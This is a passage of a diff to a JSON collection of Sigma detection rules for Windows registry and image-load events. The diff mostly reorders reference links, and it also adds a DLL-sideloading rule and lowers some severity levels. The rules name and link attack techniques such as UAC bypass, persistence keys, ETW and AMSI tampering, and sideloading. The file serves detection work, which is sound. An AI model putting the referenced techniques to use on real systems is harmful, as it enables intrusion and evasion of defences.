"https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100",
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"
],
"tags": [
@@ -20627,8 +20245,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml"
],
"tags": [
@@ -20661,8 +20279,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
"https://persistence-info.github.io/Data/mpnotify.html",
+ "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml"
],
"tags": [
@@ -20687,8 +20305,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml"
],
"tags": [
@@ -20813,8 +20431,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml"
],
"tags": [
@@ -20959,8 +20577,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml"
],
"tags": [
@@ -20993,8 +20611,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute",
+ "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623",
"https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml"
],
@@ -21094,8 +20712,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
"https://www.sans.org/cyber-security-summit/archives",
+ "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
"https://twitter.com/jamieantisocial/status/1304520651248668673",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml"
],
@@ -21223,8 +20841,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://twitter.com/dottor_morte/status/1544652325570191361",
+ "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml"
],
"tags": [
@@ -21290,8 +20908,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
+ "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml"
],
"tags": [
@@ -21381,8 +20999,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd",
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml"
],
"tags": [
@@ -21554,8 +21172,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/VakninHai/status/1517027824984547329",
- "https://twitter.com/pabraeken/status/998627081360695297",
"https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files",
+ "https://twitter.com/pabraeken/status/998627081360695297",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"
],
"tags": [
@@ -21621,8 +21239,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/autodialdll.html",
"https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/",
+ "https://persistence-info.github.io/Data/autodialdll.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml"
],
"tags": [
@@ -21679,8 +21297,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650",
"https://youtu.be/zSihR3lTf7g",
+ "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml"
],
"tags": [
@@ -21715,9 +21333,9 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml"
],
"tags": [
@@ -21784,8 +21402,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
"https://unit42.paloaltonetworks.com/ransomware-families/",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml"
],
"tags": [
@@ -21858,8 +21476,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task",
"https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml"
],
"tags": [
@@ -21893,8 +21511,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml"
],
@@ -21961,9 +21579,9 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
- "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
"https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/",
+ "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
+ "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml"
],
"tags": [
@@ -21987,9 +21605,9 @@
"logsource.product": "windows",
"refs": [
"https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
- "https://github.com/elastic/detection-rules/issues/1371",
- "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
"https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
+ "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
+ "https://github.com/elastic/detection-rules/issues/1371",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml"
],
"tags": [
@@ -22063,10 +21681,10 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/",
"https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md",
- "https://twitter.com/nas_bench/status/1626648985824788480",
"https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks",
+ "https://twitter.com/nas_bench/status/1626648985824788480",
+ "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml"
],
"tags": [
@@ -22133,8 +21751,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://twitter.com/MichalKoczwara/status/1553634816016498688",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml"
],
@@ -22158,17 +21776,17 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
"https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
"https://bunnyinside.com/?term=f71e8cb9c76a",
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml"
],
"tags": [
@@ -22244,8 +21862,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml"
],
"tags": [
@@ -22312,8 +21930,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md",
"https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml"
],
@@ -22381,10 +21999,10 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/gtworek/PSBits/tree/master/IFilter",
+ "https://persistence-info.github.io/Data/ifilters.html",
"https://twitter.com/0gtweet/status/1468548924600459267",
"https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
- "https://persistence-info.github.io/Data/ifilters.html",
+ "https://github.com/gtworek/PSBits/tree/master/IFilter",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml"
],
"tags": [
@@ -22465,8 +22083,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time",
"https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml"
],
"tags": [
@@ -22534,9 +22152,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
"https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html",
+ "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml"
],
"tags": [
@@ -22571,9 +22189,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
"https://twitter.com/dez_/status/986614411711442944",
"https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html",
+ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"
],
"tags": [
@@ -22650,9 +22268,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
- "https://twitter.com/HunterPlaybook/status/1301207718355759107",
"https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/",
+ "https://twitter.com/HunterPlaybook/status/1301207718355759107",
+ "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml"
],
"tags": [
@@ -22732,9 +22350,9 @@
"logsource.product": "windows",
"refs": [
"https://github.com/bohops/WSMan-WinRM",
- "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
"https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture",
+ "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml"
],
"tags": [
@@ -22921,8 +22539,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/wdormann/status/1547583317410607110",
"https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC",
+ "https://twitter.com/wdormann/status/1547583317410607110",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"
],
"tags": [
@@ -23116,8 +22734,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_drawing_load.yml"
],
"tags": [
@@ -23173,6 +22791,48 @@
"uuid": "facd1549-e416-48e0-b8c4-41d7215eedc8",
"value": "Amsi.DLL Load By Uncommon Process"
},
+ {
+ "description": "Detects potential DLL sideloading of \"SolidPDFCreator.dll\"",
+ "meta": {
+ "author": "X__Junior (Nextron Systems)",
+ "creation_date": "2023/05/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "image_load_side_load_solidpdfcreator.yml",
+ "level": "medium",
+ "logsource.category": "image_load",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_solidpdfcreator.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1574.001",
+ "attack.t1574.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a2edbce1-95c8-4291-8676-0d45146862b3",
+ "value": "Potential SolidPDFCreator.DLL Sideloading"
+ },
{
"description": "Detects WMI command line event consumers",
"meta": {
@@ -23262,12 +22922,12 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
- "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
"https://github.com/Wh04m1001/SysmonEoP",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
"https://decoded.avast.io/martinchlumecky/png-steganography/",
+ "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
+ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml"
],
"tags": [
@@ -23349,7 +23009,7 @@
"Legitimate applications loading their own versions of the DLL mentioned in this rule"
],
"filename": "image_load_side_load_dbgcore_dll.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
@@ -23381,7 +23041,7 @@
}
],
"uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7",
- "value": "DLL Sideloading Of DBGCORE.DLL"
+ "value": "Potential DLL Sideloading Of DBGCORE.DLL"
},
{
"description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor",
@@ -23396,8 +23056,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
"http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp",
+ "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml"
],
"tags": [
@@ -23548,10 +23208,10 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://hijacklibs.net/",
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
- "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md",
"https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://hijacklibs.net/",
+ "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml"
],
"tags": [
@@ -23672,8 +23332,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://adsecurity.org/?p=2921",
"https://github.com/p3nt4/PowerShdll",
+ "https://adsecurity.org/?p=2921",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml"
],
"tags": [
@@ -23902,8 +23562,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.py2exe.org/",
"https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/",
+ "https://www.py2exe.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml"
],
"tags": [
@@ -23936,10 +23596,10 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
+ "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
+ "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
"https://thewover.github.io/Introducing-Donut/",
"https://github.com/tyranid/DotNetToJScript",
- "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
- "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"
],
"tags": [
@@ -23973,9 +23633,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
"https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html",
+ "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml"
],
"tags": [
@@ -24008,8 +23668,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
"https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_malware_pingback_backdoor.yml"
],
"tags": [
@@ -24075,8 +23735,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/",
"https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets",
+ "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml"
],
"tags": [
@@ -24115,7 +23775,7 @@
"Legitimate applications loading their own versions of the DLL mentioned in this rule"
],
"filename": "image_load_side_load_dbghelp_dll.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
@@ -24147,7 +23807,7 @@
}
],
"uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784",
- "value": "DLL Sideloading Of DBGHELP.DLL"
+ "value": "Potential DLL Sideloading Of DBGHELP.DLL"
},
{
"description": "Detects SILENTTRINITY stager dll loading activity",
@@ -24294,8 +23954,8 @@
